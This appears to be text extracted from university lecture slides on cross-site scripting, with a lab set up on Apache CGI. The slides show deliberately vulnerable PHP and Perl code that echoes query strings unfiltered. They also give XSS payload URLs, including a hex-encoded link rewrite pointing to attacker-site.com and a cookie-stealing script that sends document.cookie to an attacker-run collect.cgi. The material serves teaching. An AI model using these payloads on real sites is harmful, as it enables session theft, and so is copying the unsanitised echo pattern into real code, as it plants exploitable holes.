Cross Site Scripting XSS Attack ChienChung Shen cshenudel

Cross Site Scripting (XSS) Attack Chien-Chung Shen cshen@udel. edu

XSS Attack (1) • User visits specially crafted link (URL) by attacker • When user visits the link, the crafted code will get executed by the user’s browser • Query-string in URL: ? name=value&name=value… – passed on to an application program at web server – this is how your search request is conveyed to search engine like Google • For instance, index. php <? php $name = $_GET['name']; echo "Welcome $name "; echo "<a href="http: //www. cis. udel. edu/">Click to Download</a>"; ? > • http: //www. cis. udel. edu/~cshen/index. php? name=Hello. World<script>alert('a ttacked')</script> • When victim loads the above URL into browser, he will see an alert box which says ‘attacked’

XSS Attack (2) • For instance, index. php <? php $name = $_GET['name']; echo "Welcome $name "; echo "<a href="http: //www. cis. udel. edu. com/">Click to Download</a>"; ? > • Attacker can now try to change “target URL” of link “Click to Download” • http: //www. cis. udel. edu/~cshen/index. php? name=Hello. World<script>window. o nload = function() {var link=document. get. Elements. By. Tag. Name("a"); link[0]. href="http: //www. usatoda y. com/"; }</script> • Call the function to execute on “window. onload” • Because the website (i. e, index. php) first echos the given name and then only it draws the <a> tag

XSS Attack (3) • Normally an attacker tends not to craft URL which human can directly read. So attacker will encode ASCII characters to hex as follows • http: //www. cis. udel. edu/~cshen/index. php? name=%48%65%6 c%6 c%57%6 f%72%6 c%6 4%3 c%73%63%72%69%70%74%3 e%77%69%6 e%64%6 f%77%2 e%6 f%6 e%6 c%6 f%61%64%20%3 d% 20%66%75%6 e%63%74%69%6 f%6 e%28%29%20%7 b%76%61%72%20%6 c%69%6 e%6 b%3 d%64%6 f% 63%75%6 d%65%6 e%74%2 e%67%65%74%45%6 c%65%6 d%65%6 e%74%73%42%79%54%61%67%4 e% 61%6 d%65%28%22%61%22%29%3 b%6 c%69%6 e%6 b%5 b%30%5 d%2 e%68%72%65%66%3 d%22%68% 74%74%70%3 a%2 f%2 f%61%74%74%61%63%6 b%65%72%2 d%73%69%74%65%2 e%63%6 f%6 d%2 f% 22%3 b%7 d%3 c%2 f%73%63%72%69%70%74%3 e attacker-site. com • Now victim may not know what it is, because directly he cannot understand that the URL is crafted and there is a more chance that he can visit the URL.

Stealing Cookies via XSS Attack (1) • Client-side XSS takes the form of attacker gets an innocent victim to click on a carefully crafted URL to a web server • Unknowingly to the victim, this URL carries a query-string portion with embedded Java. Script code that is designed to send the cookies stored in the client’s browser for web server’s domain to the attacker’s machine • Convert Wealth. Tracker. html into a CGI script named Wealth. Tracker. cgi, a Perl executable file that spits out HTML that is sent to browser requesting this page • Put Wealth. Tracker. cgi in /usr/lib/cgi-bin • http: //<ip_of_VM>/cgi-bin/Wealth. Tracker. cgi http: //<IP>/cgi-bin/Wealth. Tracker. cgi? name=<script>alert(“ Hello from a cookie stealer“); </script>

Stealing Cookies via XSS Attack (2) my $forminfo = ''; $forminfo = $ENV{QUERY_STRING}; $forminfo =~ tr/+/ /; $forminfo =~ s/%([a-f. A-F 0 -9]{2, 2})/chr(hex($1))/eg; #$forminfo =~ s/<!--(. |n)*-->//g; print "$forminfo"; • Echo back to browser a query string if it is found attached to URL received from the browser http: //<IP>/cgi-bin/Wealth. Tracker. cgi? name=<script>alert(document. cookie); </script> • Query string name=<script>alert(document. cookie); </script> • This query string would be echoed back by the server to the browser and the browser would ordinarily process the Java. Script in the value of the string – Display cookie(s) in browser

Stealing Cookies via XSS Attack (3) • An evil attacker lures victims with the following URL http: //<IP>/cgibin/Wealth. Tracker. cgi? ? name=<script>window. open("http: //<evil_VM>/cgibin/collect. cgi? cookie="%2 Bdocument. cookie)</script> • Attacker has a web server running on machine www. cis. udel. edu and its cgi-bin includes a script called collect. cgi that simply collects the information sent to <evil_VM> by the browser on the victim machine because of Java. Script code in the query-string portion of the URL. Now the attacker would be able to harvest cookies in the victim’s browser for the Wealth. Tracker. cgi web site

Stealing Cookies via XSS Attack (4) my $forminfo = ''; $forminfo = $ENV{QUERY_STRING}; $forminfo =~ tr/+/ /; $forminfo =~ s/%([a-f. A-F 0 -9]{2, 2})/chr(hex($1))/eg; #$forminfo =~ s/<!--(. |n)*-->//g; print "$forminfo"; • echo back to browser a query string if it is found attached to URL received from the browser • a clueless client has engaged in a session with this web page • assume that the same client has received a very authentic looking email that lures him/her into clicking on a link that points to the following URL 1. http: //<IP>/cgi-bin/Wealth. Tracker. cgi? name= <script>alert(document. cookie); </script> 2. http: //<IP>/cgi-bin/Wealth. Tracker. cgi? name=<script>alert("Hello from a cookie stealer"); </script> 3. http: //<IP>/cgibin/Wealth. Tracker. cgi? name= <script>window. open("http: //www. cis. udel. edu/cgibin/collect. cgi? cookie=”+document. cookie)</script>

CGI in Apache 2 (1) Add the following directive into file /etc/apache 2/sites-enabled/000 -default Script. Alias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin”> Allow. Override None Options +Exec. CGI -Multi. Views +Sym. Links. If. Owner. Match Order allow, deny Allow from all </Directory>

CGI in Apache 2 (2) To test cgi, put the following hello. cgi inside /usr/lib/cgi-bin/ #!/usr/bin/perl print "Content-type: text/htmlrn"; print '<html>'; print '<head>'; print '<title>Hello Word - First CGI Program</title>'; print '</head>'; print '<body>'; print '<h 2>Hello Word! This is my first CGI program</h 2>'; print '</body>'; print '</html>'; Then do sudo chown root: root hello. cgi sudo chmod 755 hello. cgi Open Firefox on your VM, input localhost/cgi-bin/hello. cgi It shows "Hello Word! This is my first CGI program”.